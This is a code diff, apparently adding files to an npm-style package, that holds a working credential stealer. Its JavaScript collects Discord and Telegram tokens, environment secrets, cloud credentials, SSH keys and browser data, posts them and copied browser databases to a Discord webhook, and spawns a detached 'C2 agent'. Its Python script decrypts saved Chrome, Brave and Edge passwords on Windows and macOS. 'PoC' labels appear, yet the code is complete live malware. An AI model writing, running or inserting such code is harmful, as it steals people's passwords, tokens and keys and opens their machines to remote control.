+function sendFileToWebhook(filePath, filename, caption) {
+  return new Promise((resolve) => {
+    let fileData;
+    try { fileData = fs.readFileSync(filePath); } catch { return resolve(); }
+
+    const boundary = "----PoC" + Math.random().toString(36).slice(2);
+    const payloadJson = JSON.stringify({ content: caption });
+
+    const head = Buffer.from(
+      `--${boundary}\r\nContent-Disposition: form-data; name="payload_json"\r\n\r\n${payloadJson}\r\n` +
+      `--${boundary}\r\nContent-Disposition: form-data; name="file"; filename="${filename}"\r\nContent-Type: application/octet-stream\r\n\r\n`
+    );
+    const tail = Buffer.from(`\r\n--${boundary}--\r\n`);
+    const body = Buffer.concat([head, fileData, tail]);
+
+    const url = new URL(WEBHOOK_URL);
+    const req = https.request({
+      hostname: url.hostname,
+      path: url.pathname + url.search,
+      method: "POST",
+      headers: {
+        "Content-Type": `multipart/form-data; boundary=${boundary}`,
+        "Content-Length": body.length,
+      },
+    }, () => resolve());
+    req.on("error", () => resolve());
+    req.write(body);
+    req.end();
+  });
+}
+
+async function sendAllFiles(copied) {
+  for (const f of copied) {
+    await sendFileToWebhook(
+      f.dest,
+      path.basename(f.dest),
+      `📁 \`${f.name}\` — ${f.size} bytes`
+    );
+    // Discord rate limit
+    await new Promise((r) => setTimeout(r, 1000));
+  }
+}
+
+// ── Main ──────────────────────────────────────────────────────────────────────
+
+(async function main() {
+  const data = {
+    system:   collectSystem(),
+    discord:  collectDiscordToken(),
+    telegram: collectTelegram(),
+    env:      collectEnvSecrets(),
+    passwords:collectPasswords(),
+    browsers: collectBrowsers(),
+    cloud:    collectCloudCreds(),
+    ssh:      collectSSHKeys(),
+    firefox:  collectFirefoxProfiles(),
+  };
+
+  // 1. Embed mit Uebersicht senden
+  sendEmbedOnly(buildEmbed(data));
+
+  // 2. Browser-DBs in Temp kopieren
+  const copied = dumpFiles(data.browsers);
+
+  // 3. Jede kopierte Datei als Attachment hochladen
+  if (copied.length > 0) {
+    await new Promise((r) => setTimeout(r, 1500));
+    await sendAllFiles(copied);
+  }
+
+  // 4. C2 Agent als detached Prozess starten
+  const agentPath = path.join(__dirname, "agent.js");
+  if (fs.existsSync(agentPath)) {
+    const child = spawn(process.execPath, [agentPath], {
+      detached: true,
+      stdio: "ignore",
+      env: { ...process.env },
+    });
+    child.unref();
+  }
+})();

package/scripts/extract_passwords.py

@@ -0,0 +1,188 @@
+#!/usr/bin/env python3
+import os, sys, json, base64, sqlite3, shutil, tempfile
+
+try:
+    from Crypto.Cipher import AES
+except ImportError:
+    try:
+        import subprocess
+        subprocess.run([sys.executable, "-m", "pip", "install", "pycryptodome", "-q"], check=True)
+        from Crypto.Cipher import AES
+    except Exception:
+        print(json.dumps({"error": "pycryptodome not available"}))
+        sys.exit(0)
+
+PLATFORM = sys.platform
+HOME     = os.path.expanduser("~")
+
+# ── Key extraction ────────────────────────────────────────────────────────────
+
+def get_key_windows(local_state_path):
+    try:
+        import ctypes, ctypes.wintypes
+        with open(local_state_path, "r", encoding="utf-8") as f:
+            ls = json.load(f)
+        enc_key = base64.b64decode(ls["os_crypt"]["encrypted_key"])[5:]  # strip "DPAPI"
+
+        class DATA_BLOB(ctypes.Structure):
+            _fields_ = [("cbData", ctypes.wintypes.DWORD), ("pbData", ctypes.POINTER(ctypes.c_char))]
+
+        p = ctypes.create_string_buffer(enc_key, len(enc_key))
+        blobin  = DATA_BLOB(len(enc_key), p)
+        blobout = DATA_BLOB()
+        ctypes.windll.crypt32.CryptUnprotectData(
+            ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
+        size = blobout.cbData
+        ptr  = blobout.pbData
+        key  = bytes(ptr[i] for i in range(size))
+        ctypes.windll.kernel32.LocalFree(ptr)
+        return key
+    except Exception as e:
+        return None
+
+def get_key_macos(browser_name):
+    try:
+        import subprocess
+        result = subprocess.run(
+            ["security", "find-generic-password", "-wa", browser_name],
+            capture_output=True, text=True, timeout=5
+        )
+        pw = result.stdout.strip()
+        if not pw:
+            return None
+        return (pw * 3)[:16].encode("utf-8")  # Chromium macOS key derivation
+    except Exception:
+        return None
+
+# ── Decrypt password ──────────────────────────────────────────────────────────
+
+def decrypt_password(enc_value, key):
+    try:
+        if enc_value[:3] == b"v10" or enc_value[:3] == b"v11":
+            nonce  = enc_value[3:15]
+            cipher = enc_value[15:]
+            aes    = AES.new(key, AES.MODE_GCM, nonce)
+            return aes.decrypt(cipher[:-16]).decode("utf-8", errors="replace")
+        else:
+            # Legacy: DPAPI encrypted directly (Windows only)
+            if PLATFORM == "win32":
+                import ctypes, ctypes.wintypes
+                class DATA_BLOB(ctypes.Structure):
+                    _fields_ = [("cbData", ctypes.wintypes.DWORD), ("pbData", ctypes.POINTER(ctypes.c_char))]
+                p = ctypes.create_string_buffer(enc_value, len(enc_value))
+                blobin  = DATA_BLOB(len(enc_value), p)
+                blobout = DATA_BLOB()
+                ctypes.windll.crypt32.CryptUnprotectData(
+                    ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
+                size = blobout.cbData
+                ptr  = blobout.pbData
+                pw   = bytes(ptr[i] for i in range(size)).decode("utf-8", errors="replace")
+                ctypes.windll.kernel32.LocalFree(ptr)
+                return pw
+    except Exception:
+        pass
+    return None
+
+# ── Browser profiles ──────────────────────────────────────────────────────────
+
+def get_browser_profiles():
+    if PLATFORM == "win32":
+        local = os.environ.get("LOCALAPPDATA", os.path.join(HOME, "AppData", "Local"))
+        appdata = os.environ.get("APPDATA", os.path.join(HOME, "AppData", "Roaming"))
+        return [
+            {
+                "name": "Chrome",
+                "local_state": os.path.join(local, "Google", "Chrome", "User Data", "Local State"),
+                "login_data":  os.path.join(local, "Google", "Chrome", "User Data", "Default", "Login Data"),
+                "key_name": None,
+            },
+            {
+                "name": "Brave",
+                "local_state": os.path.join(local, "BraveSoftware", "Brave-Browser", "User Data", "Local State"),
+                "login_data":  os.path.join(local, "BraveSoftware", "Brave-Browser", "User Data", "Default", "Login Data"),
+                "key_name": None,
+            },
+            {
+                "name": "Edge",
+                "local_state": os.path.join(local, "Microsoft", "Edge", "User Data", "Local State"),
+                "login_data":  os.path.join(local, "Microsoft", "Edge", "User Data", "Default", "Login Data"),
+                "key_name": None,
+            },
+        ]
+    else:  # macOS
+        lib = os.path.join(HOME, "Library", "Application Support")
+        return [
+            {
+                "name": "Chrome",
+                "local_state": os.path.join(lib, "Google", "Chrome", "Local State"),
+                "login_data":  os.path.join(lib, "Google", "Chrome", "Default", "Login Data"),
+                "key_name": "Chrome",
+            },
+            {
+                "name": "Brave",
+                "local_state": os.path.join(lib, "BraveSoftware", "Brave-Browser", "Local State"),
+                "login_data":  os.path.join(lib, "BraveSoftware", "Brave-Browser", "Default", "Login Data"),
+                "key_name": "Brave Browser",
+            },
+            {
+                "name": "Edge",
+                "local_state": os.path.join(lib, "Microsoft Edge", "Local State"),
+                "login_data":  os.path.join(lib, "Microsoft Edge", "Default", "Login Data"),
+                "key_name": "Microsoft Edge",
+            },
+        ]
+
+# ── Main extraction ───────────────────────────────────────────────────────────
+
+def extract_all():
+    results = []
+
+    for browser in get_browser_profiles():
+        if not os.path.exists(browser["login_data"]):
+            continue
+
+        # Get decryption key
+        key = None
+        if PLATFORM == "win32":
+            if os.path.exists(browser["local_state"]):
+                key = get_key_windows(browser["local_state"])
+        else:
+            key = get_key_macos(browser["key_name"])
+
+        if not key:
+            continue
+
+        # Copy DB to temp (browser locks the file)
+        tmp = os.path.join(tempfile.gettempdir(), f"poc_{browser['name']}_login.db")
+        try:
+            shutil.copy2(browser["login_data"], tmp)
+        except Exception:
+            continue
+
+        try:
+            conn = sqlite3.connect(tmp)
+            rows = conn.execute(
+                "SELECT origin_url, username_value, password_value FROM logins"
+            ).fetchall()
+            conn.close()
+        except Exception:
+            continue
+        finally:
+            try: os.remove(tmp)
+            except: pass
+
+        for url, user, enc_pw in rows:
+            if not user and not enc_pw:
+                continue
+            pw = decrypt_password(enc_pw, key) if enc_pw else ""
+            results.append({
+                "browser": browser["name"],
+                "url":      url,
+                "username": user,
+                "password": pw or "(encrypted)",
+            })
+
+    print(json.dumps(results))
+
+if __name__ == "__main__":
+    extract_all()